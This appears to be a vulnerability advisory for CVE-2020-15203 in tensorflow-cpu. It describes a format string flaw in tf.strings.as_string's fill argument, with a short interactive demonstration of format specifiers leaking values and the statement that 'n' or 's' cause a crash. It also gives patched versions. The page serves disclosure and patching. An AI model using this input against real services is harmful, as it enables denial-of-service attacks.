logo

CVE-2020-15203 tensorflow-cpu

Package

Manager: pip
Name: tensorflow-cpu
Vulnerable Version: >=0 <1.15.4 || >=2.0.0 <2.0.3 || >=2.1.0 <2.1.2 || =2.2.0 || >=2.2.0 <2.2.1 || =2.3.0 || >=2.3.0 <2.3.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.0036 pctl0.57442

Details

Denial of Service in Tensorflow ### Impact By controlling the `fill` argument of [`tf.strings.as_string`](https://www.tensorflow.org/api_docs/python/tf/strings/as_string), a malicious attacker is able to trigger a format string vulnerability due to the way the internal format use in a `printf` call is constructed: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/as_string_op.cc#L68-L74 This can result in unexpected output: ```python In [1]: tf.strings.as_string(input=[1234], width=6, fill='-') Out[1]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['1234 '], dtype=object)> In [2]: tf.strings.as_string(input=[1234], width=6, fill='+') Out[2]: <tf.Tensor: shape=(1,), dtype=string, numpy=array([' +1234'], dtype=object)> In [3]: tf.strings.as_string(input=[1234], width=6, fill="h") Out[3]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['%6d'], dtype=object)> In [4]: tf.strings.as_string(input=[1234], width=6, fill="d") Out[4]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['12346d'], dtype=object)> In [5]: tf.strings.as_string(input=[1234], width=6, fill="o") Out[5]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['23226d'], dtype=object)> In [6]: tf.strings.as_string(input=[1234], width=6, fill="x") Out[6]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['4d26d'], dtype=object)> In [7]: tf.strings.as_string(input=[1234], width=6, fill="g") Out[7]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['8.67458e-3116d'], dtype=object)> In [8]: tf.strings.as_string(input=[1234], width=6, fill="a") Out[8]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['0x0.00ff7eebb4d4p-10226d'], dtype=object)> In [9]: tf.strings.as_string(input=[1234], width=6, fill="c") Out[9]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['\xd26d'], dtype=object)> In [10]: tf.strings.as_string(input=[1234], width=6, fill="p") Out[10]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['0x4d26d'], dtype=object)> In [11]: tf.strings.as_string(input=[1234], width=6, fill='m') Out[11]: <tf.Tensor: shape=(1,), dtype=string, numpy=array(['Success6d'], dtype=object)> ``` However, passing in `n` or `s` results in segmentation fault. ### Patches We have patched the issue in 33be22c65d86256e6826666662e40dbdfe70ee83 and will release patch releases for all versions between 1.15 and 2.3. We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.

Metadata

Created: 2020-09-25T18:28:37Z
Modified: 2024-10-28T21:23:19Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-xmq7-7fxm-rr79/GHSA-xmq7-7fxm-rr79.json
CWE IDs: ["CWE-134", "CWE-20"]
Alternative ID: GHSA-xmq7-7fxm-rr79
Finding: F184
Auto approve: 1